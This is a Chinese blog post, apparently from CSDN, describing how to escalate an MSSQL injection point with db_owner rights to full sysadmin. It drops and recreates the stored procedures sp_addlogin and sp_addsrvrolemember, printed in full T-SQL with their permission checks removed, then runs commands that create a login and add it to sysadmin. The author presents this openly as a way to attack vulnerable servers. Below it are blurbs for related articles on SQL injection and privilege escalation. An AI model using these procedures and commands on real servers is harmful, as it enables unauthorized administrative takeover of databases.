msSQL注入通杀,只要有注入点就有系统权限

最新推荐文章于 2024-06-04 13:39:30 发布
最新推荐文章于 2024-06-04 13:39:30 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 网络安全 文章标签: encryption null sql ie 服务器 go
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chinawn/article/details/483985
版权
不知道大家看过这篇文章没有,可以在db_owner角色下添加SYSADMIN帐号,这招真狠啊,存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure  sp_addlogin
    @loginame  sysname
   ,@passwd         sysname = Null
   ,@defdb          ; ; sysname = ’master’      -- UNDONE: DEFAULT 
CONFIGURABLE???
   ,@deflanguage    sysname = Null
   ,@sid   varbinary(16) = Null
   ,@encryptopt  varchar(20) = Null
AS
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
 set nocount on
 Declare @ret    int    -- return value of sp call
    
    -- DISALLOW USER TRANSACTION --
 set implicit_transactions off
 IF (@@trancount 〉 0)
 begin
  raiserror(15002,-1,-1,’sp_addlogin’)
  return (1)
 end
    -- VALIDATE LOGIN NAME AS:
    --  (1) Valid SQL Name (SQL LOGIN)
    --  (2) No backslash (NT users only)
    --  (3) Not a reserved login name
 execute @ret = sp_validname @loginame
 if (@ret 〈〉 0)
        return (1)
    if (charindex(’/’, @loginame) 〉 0)
    begin
        raiserror(15006,-1,-1,@loginame)
        return (1)
    end
 --Note: different case sa is allowed.
 if (@loginame = ’sa’ or lower(@loginame) in (’public’))
 begin
  raiserror(15405, -1 ,-1, @loginame)
  return (1)
 end
    -- LOGIN NAME MUST NOT ALREADY EXIST --
 if exists(select * from master.dbo.syslogins where loginname = 
@loginame)
 begin
  raiserror(15025,-1,-1,@loginame)
  return (1)
 end
 -- VALIDATE DEFAULT DATABASE --
 IF db_id(@defdb) IS NULL
 begin
  raiserror(15010,-1,-1,@defdb)
     return (1)
 end
 -- VALIDATE DEFAULT LANGUAGE --
 IF (@deflanguage IS NOT Null)
 begin
  Execute @ret = sp_validlang @deflanguage
  IF (@ret 〈〉 0)
   return (1)
 end
 ELSE
 begin
  select @deflanguage = name from master.dbo.syslanguages
  where langid = @@default_langid --server default 
language
  if @deflanguage is null
   select @deflanguage = N’us_english’
 end
 -- VALIDATE SID IF GIVEN --
 if ((@sid IS NOT Null) and (datalength(@sid) 〈〉 16))
 begin
  raiserror(15419,-1,-1)
   return (1)
 end
 else if @sid is null
  select @sid = newid()
 if (suser_sname(@sid) IS NOT Null)
 begin
  raiserror(15433,-1,-1)
   return (1)
 end
 -- VALIDATE AND USE ENCRYPTION OPTION --
 declare @xstatus smallint
 select @xstatus = 2 -- access
 if @encryptopt is null
  select @passwd = pwdencrypt(@passwd)
 else if @encryptopt = ’skip_encryption_old’
 begin
  select @xstatus = @xstatus | 0x800, -- old-style 
encryption
   @passwd = convert(sysname, convert(varbinary
(30), convert(varchar(30), @passwd)))
 end
 else if @encryptopt 〈〉 ’skip_encryption’
 begin
  raiserror(15600,-1,-1,’sp_addlogin’)
  return 1
 end
    -- ATTEMPT THE INSERT OF THE NEW LOGIN --
 INSERT INTO master.dbo.sysxlogins VALUES
        (NULL, @sid, @xstatus, getdate(),
             getdate(), @loginame, convert(varbinary(256), @passwd),
             db_id(@defdb), @deflanguage)
 if @@error 〈〉 0  -- this indicates we saw duplicate row
        return (1)
 -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE 
SYSLOGINS CHANGE --
 exec(’use master grant all to null’)
    -- FINALIZATION: RETURN SUCCESS/FAILURE --
 raiserror(15298,-1,-1)
 return  (0) -- sp_addlogin
GO
OK,我们新建个用户exec master..sp_addlogin xwq

再drop procedure sp_addsrvrolemember,然后在IE里输入


create procedure sp_addsrvrolemember
    @loginame sysname,   -- login name
    @rolename sysname = NULL -- server role name
as
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
 set nocount on
 declare @ret        int,    -- return value of sp call
             @rolebit    smallint,
             @ismem      int
    -- DISALLOW USER TRANSACTION --
 set implicit_transactions off
 IF (@@trancount 〉 0)
 begin
  raiserror(15002,-1,-1,’sp_addsrvrolemember’)
  return (1)
 end
    
    -- CANNOT CHANGE SA ROLES --
    if @loginame = ’sa’
    begin
        raiserror(15405, -1 ,-1, @loginame)
        return (1)
    end
    -- OBTAIN THE BIT FOR THIS ROLE --
    select @rolebit = CASE @rolename
             WHEN ’sysadmin’         THEN 16
             WHEN ’securityadmin’    THEN 32
             WHEN ’serveradmin’      THEN 64
             WHEN ’setupadmin’       THEN 128
             WHEN ’processadmin’     THEN 256
             WHEN ’diskadmin’        THEN 512
             WHEN ’dbcreator’        THEN 1024
   WHEN ’bulkadmin’  THEN 4096
             ELSE NULL END
    -- ADD ROW FOR NT LOGIN IF NEEDED --
 if not exists(select * from master.dbo.syslogins where 
loginname = @loginame)
    begin
        execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
        if (@ret 〈〉 0)
     begin
      raiserror(15007,-1,-1,@loginame)
      return (1)
     end
    end
    -- UPDATE ROLE MEMBERSHIP --
    update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, 
xdate2 = getdate()
     where name = @loginame and srvid IS NULL
 -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE 
SYSLOGINS CHANGE --
 exec(’use master grant all to null’)
 raiserror(15488,-1,-1,@loginame,@rolename)
    -- FINALIZATION: RETURN SUCCESS/FAILURE
 return (@@error) -- sp_addsrvrolemember
GO

接着再exec master..sp_addsrvrolemember xwq,sysadmin
这样就建立了一个SA用户了,用SQL连接器连接上就OK了。很爽吧。不过在实践过程中发现用NB的SQL命令执行时会提示发送错误,可能是代码太长了的缘故,用IE又不方便,希望哪位能发个执行SQL语句的工具来方便大家。OK,到此结束
chinawn
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入进行测试以下是Mysql中可以用到的...
mysql注入获取真实ip_IPB2注入漏洞的深入利用
weixin_33316599的博客
01-21 175
在上一篇《PHP+MySQL注入导出文件的新发现——附带IPB2的漏洞利用》,利用IPB2的注入漏洞获得管理员的资料,修改COOKIE可以得到前台的管理权限。不少人埋怨没有什么用,其实这个是大多数人不了解IPB2的原因。因为过滤了很多特殊字符,包括单引号,全部转为十进制了。其实充分发挥一下想象力。也是有可能拿到后台管理员或者webshell的,注意,是可能,因为这个并不是通杀的,为什么不是通杀的,...
SQL注入之MYSQL注入总结-20240517更新mysql可报错注入函数
qq_39764475的博客
08-12 2101
简介 information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息。 让我们从爆破表名到了可以直接查询。 information_schema是MySQL5.0以上数据库独有,MYSQL4.X的没有,只能进行对库名、表名、列名暴力破解。 基本使用 基本语法 1.建立数据库 mysql> create database mysqltest; Query OK, 1 row affected (0.00 sec) 2.查询所有数据库 mysql> show d
通杀! 熬夜码的 - 八万字 - 让你一文读懂SQL注入漏洞原理及各种场景利用
易编橙 · 终身成长社群,相遇已是上上签!
10-24 1497
WEB攻防漏洞的本质 漏洞特定函数: 漏洞的成因必然会涉及到所用的函数,不同的开发语言都有一些特定的函数用于不同的作用。 有些函数用于数据库查询,有的函数用于文件读写,有的函数用于调试输出等。函数在使用的时候会和漏洞形成的关系是什么? 漏洞产生的原因必定会使用到类似的脚本语言的特定函数,比如SQL注入漏洞,必然会涉及到数据库查询操作类的相关函数。 这就是漏洞的特定函数。所以在代码层,我们就可以通过函数猜解存在有那些漏洞,反推也可以根据漏洞猜解使用了哪些特定函数。 传输可
id 0e1union mysql_史上最水的MYSQL注入总结
weixin_26833139的博客
03-04 238
[TOC]0x1 Forward​ 这篇文章的雏形我是发在了t00ls,后来我想了下还有其他挺有意思的内容还没总结进来,于是就有了一篇升级版(ps水货本质还是没变),希望有需要的师傅可以阅读看看。0x2 MySQL 基础知识1.字符串截取函数left(str,index) //从左边第index开始截取right(str,index) //从右边第index开始截取substring(str...
SQL注入详解
热门推荐
huangyongkang666的博客
03-20 4万+
SQL注入详解 1.SQL注入简介 ​ SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 ​ Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一 2. sql 注入产生原因及威胁 ​ 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行
数据库之Mysql提权
白帽黑客鹏哥的博客
05-29 1084
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
SQL注入
F2444790591的博客
06-17 943
SQL注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。 当输入的参数为整型时,且存在注入漏洞,可以认为是数字型注入。 当输入的参数为字符时,且存在注入漏洞,可以认为是字符型注入。 这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数,一般在链接地址中有“keyword=关键字”,有的不显示在的链接地址里面,而是直接通过搜索
WEB攻防-注入工具&SQLMAP&Tamper编写&指纹修改&高权限操作&目录架构
siu~
09-06 231
1、注入工具-SQLMAP-常规猜解&字典配置 2、注入工具-SQLMAP-权限操作&文件命令 3、注入工具-SQLMAP-Tamper&使用&开发 4、注入工具-SQLMAP-调试指纹&风险等级
SQL注入总结
最新发布
2401_84466359的博客
06-04 793
大小写混搭and!!!!1=1/**//*!50000*/编码,base64,ascii,hex编码白名单绕过,X-Forwarded-For:127.0.0.1容器特性iis特性1. 当传入的 s%e%l%e%c%t 函数被%分割时,解析出来还是select2. iis支持Unicode的解析 我们传入s%u0065lect解析为selectapache特性&id=1&id=2 他只解析最后一个绕过时,可以进行组合尝试,如。
PHP+MYSQL 注入靶场
04-26
SQL注入通常针对的是数据库的查询操作,因此了解MySQL的语法和特性对于识别和利用潜在的注入至关重要。例如,了解如何使用`UNION SELECT`、`LIKE`、`OR`等操作符构造恶意查询,或者如何通过`LIMIT`和`ORDER BY`来...
mysql注入-sqlilabs靶场注入
10-15
通过实际操作,你将学会如何识别注入,构造合适的payload,以及使用各种工具(如Burp Suite、Sqlmap等)自动化注入过程。 总的来说,这个PDF文档会详尽地解释SQL注入的各个方面,包括概念、技术、实战和防御措施...
MySQL解决SQL注入的另类方法详解
09-10
在MySQL中,防止SQL注入有多种方法,包括使用预编译语句、参数化查询、转义特殊字符等。本文主要探讨一些非传统的、另类的方法来解决SQL注入问题。 首先,我们来看问题的本质。当用户输入被直接插入到SQL语句中时,...
SQL Injection with MySQL 注入分析
09-14
实际上,只要能构造出不受引号限制的SQL语句,就有可能实现注入。例如,可以通过`UNION`操作结合多个查询,或者利用`OR`、`AND`等逻辑运算符构造条件,以达到执行非法SQL的目的。 在案例中,当变量$id为`1' and 1=2...
AutoRun.inf文件
动性忍心
04-18 3666
最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中的方法,由于AutoRun.inf文件在技术中的应用还是很少见的,相应的资料也不多,有很多人对此觉得很神秘,本文试图为您解开这个迷,使您能完全的了解这个并不复杂却极其有趣的技术。  一、理论基础  经常使用光盘的朋友都知道,有很多光盘放入光驱就会自动运行,它们是怎么做的呢?光盘一放入光驱就会自动被执行,主要依靠两个文件,一是光盘
非常经典的渗透入侵
动性忍心
04-12 3443
作者:sunwear mail:shellcoder@163.com time:2004,5,7 前言: 这篇文章比较长,希望你有耐心看完。我入侵的服务器为国家一个著名安全站。过程很复杂 经过了1个星期的奋斗。希望多各位有所帮助。 请耐心看完 :)。其中也有关于社会工程学的。 正文 废话不说。开工 C:/Documents and Settings/Administrator>ping www.
如何保护自己的机器不受“网络执法官”盗用IP地址及密码
动性忍心
08-25 3424
[信息来源:信息中心 录入:信息中心  发表时间:2004-3-23 14:30:22 ]     大家最近可能都听说过一个软件“网络执法官”,此软件本来是一个不错的网络管理软件,可却被一些别有用心的人用来为非作歹,经过研究发现此软件是一款局域网管理辅助软件,采用网络底层协议,能穿透各客户端防火墙对网络中的每一台主机(包括各种计算机、交换机等配有IP的网络设备)进行监控和管理,甚至可把合法用户赶下
使用Http通道突破防火墙限制
动性忍心
04-12 2616
不少公司的防火墙作了较为严格的限制,以至于很多网络服务如QQ、MSN都无法运行,如果你还能够打开网页,那么,使用Http通道软件可以让你突破限制,可以在现有的网络条件中使用任何网络服务。   使用Http通道软件可以突破防火墙的限制,利用唯一Http访问的权限获得其他Internet应用。那么什么是通道呢?这里所谓的通道,是指一种绕过防火墙端口屏蔽的通讯方式。防火墙两端的数据包封装在防火墙所允许通
PHP+MySQL注入详解与防范策略
文章接下来纠正了一个常见的误区,即许多人认为在PHP+MySQL环境下,必须使用单引号进行注入,实际上,随着技术的进步,已经可以通过特定技巧构造不带引号的有效SQL语句,只要具备足够的经验和技巧,构建攻击的成功率...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值